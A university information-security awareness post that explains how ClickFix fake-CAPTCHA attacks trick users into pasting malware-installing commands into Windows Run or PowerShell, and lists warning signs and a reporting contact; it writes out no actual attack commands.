첥Ƶ

Skip to main content Skip to local navigation
Information Security

Fake CAPTCHA, Real Threat: ClickFix Social Engineering Attacks

Posted on 22 April 2026

ClickFix attacks are a rapidly evolving threat that use fake CAPTCHA pages to trick people into running malicious commands (often PowerShell) on their own devices. In every ClickFix case, the attacker relies on one thing: your participation. Most traditional phishing attempts and malicious sites are filtered or blocked long before they reach you. That’s why ClickFix pushes you to take extra steps yourself. By convincing you to run a command, the attacker gets past the protections already set in place and installs malware that would otherwise be detected.

What is ClickFix?

ClickFix is a social engineering technique where attackers compromise legitimate websites and replace normal verification steps such as CAPTCHAs with fake prompts, and instruct users to run malicious commands on their computers. These commands often involve opening the Windows Run dialog or PowerShell and pasting in a script that appears to “fix” a problem or “verify” the user. In reality, the script is being used to download malware that compromises your device.

This technique has been observed across higher‑education institutions and is increasingly used to deploy malware families such as , a backdoor capable of downloading additional payloads, collecting system information, and maintaining persistence on the device.

How does it Work?

ClickFix attacks follow a simple pattern:

  1. You click on a link from a search result or ad, and as the page loads, a strange-looking CAPTCHA or pop‑up appears unexpectedly.
  2. Instead of asking you to click images or check a box, it tells you there’s a “problem” and you need to run a command to continue.
  3. The page instructs you to open Windows + R, PowerShell, or Terminal and paste in a line of text.
  4. That command silently downloads malware onto your device. In many cases, it installs a backdoor such as CORNFLAKE.V3, which can download additional malicious files onto your system, collect system information, and stay hidden on your machine.

Because the attacker convinces you to run the command, your device treats it as a trusted action, making it much harder for security tools to block.

How Can I Spot a ClickFix Attempt?

Exercise caution towards any unfamiliar website, email, or popup that:

  • Asks you to open Windows Run (Windows + R)
  • Tells you to paste a command into PowerShell or Terminal
  • Claims you must run a script to “fix,” “verify,” or “continue”
  • Appears immediately after clicking a search result or ad
  • Displays a CAPTCHA that looks unusual, low‑quality, or out of place

If you encounter instructions like:

“Press Windows + R and paste the following command…”

…it is almost certainly malicious.

If you suspect you may have interacted with a ClickFix prompt, please report it to the Information Security Team immediately (infosec@yorku.ca).

References:

  • https://unit42.paloaltonetworks.com/preventing-clickfix-attack-vector/
  • https://www.microsoft.com/en-us/security/blog/2025/08/21/think-before-you-clickfix-analyzing-the-clickfix-social-engineering-technique/
  • https://cloud.google.com/blog/topics/threat-intelligence/analyzing-cornflake-v3-backdoor/